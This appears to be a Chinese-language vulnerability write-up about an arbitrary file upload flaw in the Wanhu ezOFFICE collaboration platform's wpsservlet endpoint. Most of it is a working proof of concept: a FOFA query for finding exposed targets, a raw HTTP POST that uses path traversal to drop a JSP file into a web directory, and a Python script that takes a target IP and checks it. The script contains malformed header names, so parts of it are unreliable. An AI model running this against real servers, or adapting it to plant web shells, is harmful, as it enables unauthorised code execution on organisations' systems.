声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、漏洞描述

万户ezOFFICE协同管理平台是一个综合信息基础应用平台，平台ezoffice wpsservlet接口存在任意文件上传漏洞。

二、fofa语法

app="万户网络-ezOFFICE"

三、漏洞复现

poc

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cache-Control: max-age=0
Content-Length: 176
Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb

--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"

<% out.print("797276100");%>
--55aeb894de1521afe560c924fad7c6fb--

拼接上传地址：http://xxxxxx/defaultroot/platform/portal/layout/40067.jsp

被拦截了

四、poc.py

import requests

def verify(ip):

    url = f'{ip}/defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp'

    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Cache - Control': 'max - age = 0',
        'Content - Length': '176',
        'Content-Type': 'multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb'
    }

    payload = '''
    --55aeb894de1521afe560c924fad7c6fb
    Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"
    
    <% out.print("success");%>
    --55aeb894de1521afe560c924fad7c6fb--
    '''

    try:
        response = requests.post(url, headers=headers, data=payload)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞！！！")
    except Exception as e:
        pass


if __name__ == '__main__':
    self = input('请输入目标主机IP地址：')
    verify(self)

五.整改意见

厂商尚未提供漏洞修补方案，请关注厂商主页及时更新： http://www.whir.net